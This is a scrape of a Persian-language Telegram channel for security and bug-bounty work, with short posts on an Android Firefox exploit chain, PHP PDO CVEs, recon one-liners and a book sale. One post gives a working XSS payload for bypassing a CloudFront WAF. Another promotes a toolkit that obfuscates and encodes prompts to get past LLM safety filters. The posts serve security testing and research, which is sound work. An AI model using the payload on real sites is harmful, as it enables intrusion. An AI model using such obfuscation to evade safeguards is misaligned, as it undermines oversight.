World Of Security
5.18K subscribers
45 photos
10 videos
21 files
620 links
Download Telegram
This media is not supported in your browser
VIEW IN TELEGRAM
کشف زنجیره آسیب‌پذیری جدید: root کردن اندروید ۱۷ از طریق فایرفاکس!
گزارش‌های جدید از کشف یک زنجیره اکسپلویت کامل (Browser-to-Kernel) خبر می‌دهند که تنها با کلیک بر روی یک لینک، دسترسی روت (Root) در اندروید ۱۷ ایجاد می‌کند. این اکسپلویت از یک آسیب‌پذیری روز صفر (0-day) استفاده می‌کند.
🔹 جزئیات کلیدی:
شناسه آسیب‌پذیری: CVE-2026-10702
هدف: مرورگر فایرفاکس در اندروید (نسخه‌های قبل از v151.0.2)
سطح دسترسی: دسترسی کامل از مرورگر تا هسته سیستم‌عامل (Kernel)
🔒 توصیه امنیتی: اگر از مرورگر فایرفاکس روی دستگاه‌های اندرویدی خود استفاده می‌کنید، در اسرع وقت آن را به آخرین نسخه (v151.0.2 یا بالاتر) بروزرسانی کنید و از کلیک بر روی لینک‌های مشکوک خودداری نمایید.
🔥112👍1
XSS: Bypass CloudFront WAF
<object/data="javascript:alert/**/(document.domain)">//</object>
🔥92
Wayback URL Recon - One Liner

curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//' | sort -u
🔥61
World Of Security
Wayback URL Recon - One Liner curl -s 'https://web .archive.org/cdx/search/cdx?url=testphp.vulnweb.com/*&output=text&fl=original&collapse=urlkey&filter=statuscode:200' | grep -viP '\.(png|jpg|jpeg|gif|svg|ico|pdf|css|mp4|woff2?|ttf|eot)(\?|$)' | sed 's/:80\//\//'…
البته این یک مثال ساده از بروت لاجیک بود. اما کلا ایده اینه که شما بیایی هرچقدر که میتونی همه چیز رو برای خودتون بهینه کنید.

بعضی وقت ها میبینم که بعضی از دوستان مدت هاست که دارن وقت میزارن رو یک ابزار ریکان خفن بدون دانش صحیح ریکان و متدولوژی مناسب ریکان.
6
World Of Security pinned Deleted message
ابزار تخصصی Bypass Guardrail LLM

یکی از دردسرهای اصلی تست امنیت مدل‌های زبانی، ساخت دستی و تکراری payloadهای obfuscated هست.
این toolkit قدرتمند به صورت اتوماتیک پرامپت‌های ورودی رو با مجموعه گسترده‌ای از تکنیک‌های obfuscation، encoding، transformation و evasion پردازش می‌کنه تا بتونی guardrailهای مختلف (safety filters، alignment mechanisms، output restrictions) رو تست و bypass کنی.

https://x.com/intigriti/status/2072245581309792479?t=80c3yWyYo7494DcuQIPb3Q&s=19

https://elder-plinius.github.io/P4RS3LT0NGV3/
🔥61
🔥31👏1
dom xss cheat sheet

@world_of_security
👍259🔥4🥰1
World Of Security
dom xss cheat sheet @world_of_security
اگر محتوا های این مدلی رو در کنار دیگر لینک های که می‌خونیم دوست دارید
ری اکشن بزارید

موضوع این چیت شیت ها اینه که چیز هایی که می‌خونیم و تحقیق میکنیم رو می‌دیم به ai خلاصشو براتون شیر میکنیم

پس با ری اکشناتون روی پست بالا مارو حمایت کنید
13👍3
🐘 PHP PDO layer exposed! Aleksey Solovev & Nikita Sveshnikov uncovered 2 flaws: SQL Injection in pdo_firebird (CVE-2025-14179) and DoS in PDO via pdo_pgsql (CVE-2025-14180).

https://swarm.ptsecurity.com/hack-the-elephant-one-bite-at-a-time-nul-byte-sql-injection-in-pdo_firebird-and-null-pointer-dereference-in-pdo-pgsql/
4🔥1
این مخزن میاد تمامی برنامه هارو از پلتفرم های باگ بانتی جمع آوری می‌کنه و اونارو در اختیارتون قرار میده
چیز عجیبی نیست و قدیمی هم هست اما خب هنوز هم می‌تونه کار آمد باشه.

https://github.com/arkadiyt/bounty-targets-data
🔥72
😁23
نمی‌فهمم بخدا. تا میاییم یزره به زندگیمون برسیم چنتا چیز یادبگیریم ی کوچولو کار کنیم جنگ میشه :) این زندگی نیست بخدا
👍372
Forwarded from SecCode (Meisam Monsef)
پیش فروش کتاب جامع تست نفوذ وب ( جلد اول ) شروع شد .

تالیف : میثم منصف

قیمت نهایی کتاب : 18,000,000 ریال با تخفیف 15 درصد 15,300,000 ریال

دقت داشته باشید در حال دریافت مجوز کتاب هستیم و فعلا پیش فروش فقط از طریق وب سایت انجام میشود.
تا تاریخ 1405/05/05 فرصت دارید پیش ثبت نام و هزینه آن را پرداخت کنید چون تعداد محدودی چاپ میشود .
این کتاب فقط به صورت حضوری در تهران قابل تهیه و دریافت است و متأسفانه امکان ارسال برای شهرستان‌ها یا حتی داخل تهران نداریم.
آدرس محل دریافت کتاب را به‌ زودی اعلام می‌کنیم.

برای خرید کتاب به آدرس زیر مراجعه کنید :‌

https://mrowasp.ir/buy-book

@SecCode
3🔥2